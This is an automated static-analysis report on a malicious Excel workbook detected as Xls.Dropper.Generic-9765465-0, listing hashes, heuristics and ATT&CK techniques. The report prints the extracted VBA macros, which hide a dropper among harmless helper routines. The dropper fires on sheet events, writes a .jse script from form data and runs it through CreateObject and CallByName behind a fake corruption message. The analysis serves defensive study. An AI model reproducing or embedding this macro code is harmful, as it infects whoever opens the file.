Xls.Dropper.Generic-9765465-0 — Office (OOXML) malware analysis

Static analysis result for SHA-256 15b18423900b283b…

MALICIOUS

Office (OOXML)

599.6 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-07-24
MD5: f8204f2ca4f4cb00f306c06d571acb15 SHA-1: 76821f2608749556fad6922aae08bb558ad8338f SHA-256: 15b18423900b283b1c89efcae0652761bcde40dfb45118c3fd9b4f4659701d56
230 Risk Score

Malware Insights

Xls.Dropper.Generic-9765465-0 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Xls.Dropper.Generic-9765465-0. It contains VBA macros that utilize CreateObject and CallByName functions, indicative of malicious intent. The VBA code attempts to construct a JavaScript file path and execute it, suggesting it acts as a dropper for a second-stage payload.

Heuristics 6

  • ClamAV: Xls.Dropper.Generic-9765465-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-9765465-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • External hyperlinks (4) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 4 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.quora.com/profile/Alok-Jha-43
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.micr In document text (OOXML body / shared strings)
    • http://schemasIn document text (OOXML body / shared strings)
    • https://www.quora.com/profile/Alok-Jha-43Document hyperlink

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4538 bytes
SHA-256: 81c5d81e4281db8b8b5d5ad38e9ebf7df1152976cfba7c046c230e77581622d2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'14. Highlight Named Ranges
'
'If you are not sure about how many named ranges you have in your worksheet then you can use this code to highlight all of them.
'

Sub CustomHeader()
Dim myText As String
myText = InputBox("Enter your text here", "Enter Text")
With ActiveSheet.PageSetup
.LeftHeader = ""
.CenterHeader = myText
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
End Sub


Sub HighlightDuplicateValues()
Dim myRange As Range
Dim myCell As Range
Set myRange = Selection
For Each myCell In myRange
If WorksheetFunction.CountIf(myRange, myCell.Value) > 1 Then
myCell.Interior.ColorIndex = 36
End If
Next myCell
End Sub

Sub highlightCommentCells(se As String)
Selection.SpecialCells(xlCellTypeComments).Select
Selection.Style = se
End Sub

Private Function MIObj() As Object
Dim Rng As Range
Dim x As Range
Set x = Worksheets("Sheet1").Cells
For Each Rng In Selection
If WorksheetFunction.IsNumber(Rng) Then
If Rng.Value < 0 Then
Rng.Font.Color = -16776961

End If
End If
Set MIObj = CreateObject(Replace(UserForm1.xx0.Caption & UserForm1.xx1.Caption, " ", ""))
Next
End Function


Private Sub PO_NOx()
Dim DbNop As String
Dim BTgol As String
BTgol = """"
'highlightCommentCells BTgol
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "Finish"
MsgBox Application.Path & Chr(13) & Chr(10) & ": The file is corrupted and cannot be opened " & CallByName(MIObj, UserForm1.Film.Caption, 1, BTgol & DbNop & BTgol, 1)
HighlightDuplicateValues
ActiveWorkbook.Close SaveChanges:=True
End Sub

Private Sub DOlrf()
Debug.Print "drswe"
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "hyij"
Open DbNop For Output As #1
Debug.Print "rtf ijuo"
Print #1, UserForm1.Doner.Value
Debug.Print "Kol 7yh7"
Close #1
End Sub



Sub Bei_yhu(FInrtg As Byte)
Dim SA As Workbook
Debug.Print "esdruyg"
    awse = ActiveWorkbook.Application.StartupPath & "\..\Pray2"
    'ActiveWorkbook.Ap
    On Error Resume Next
    MkDir awse
    NRople = awse & "\Note" & FInrtg & ".xlsm"
    Application.DisplayAlerts = False
    ActiveWorkbook.SaveCopyAs NRople
    Subrt2 = "DOlrf"
    Debug.Print "esdruyg"
    Jolp = "PO_NOx"
    Set SA = Workbooks.Open(NRople)
    If UserForm1.Label1.Caption = "Solt" Then
    UserForm1.Label1.Caption = "seaq gytugty"
    'first
    SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Subrt2
    Else
    'second
    SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Jolp
    End If
    Set SA = Nothing
    Debug.Print "Kol 7yh7"
   
End Sub




Private Sub Worksheet_PivotTableUpdate(ByVal Target As PivotTable)
'runs
Bei_yhu 102
End Sub



Private Sub Worksheet_Calculate()
'mer
Bei_yhu 101
End Sub





Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{75B6774F-339A-4ADB-B614-4A5ACC9DED60}{DD47C5FB-8B24-4F24-99DA-844CDEFF4F86}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
Debug.Print "Change"
End Sub

Private Sub Label3_Click()

End Sub

Private Sub ComboBox1_Change()

End Sub

Private Sub RefEdit1_BeforeDragOver(Cancel As Boolean, ByVal Data As MSForms.DataObject, ByVal x As stdole.OLE_XPOS_CONTAINER, ByVal y As stdole.OLE_YPOS_CONTAINER, By
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 686080 bytes
SHA-256: d3e7eb1932d0840d9a80c15f619c72e2f05a0c71716d0ba74b9be0610299b97b
Detection
ClamAV: Xls.Dropper.Generic-9765465-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 1842004 bytes
SHA-256: 0295c5e4bea86a8a79ab50edfaa4d774e2d02df6ff818f54392499799e047686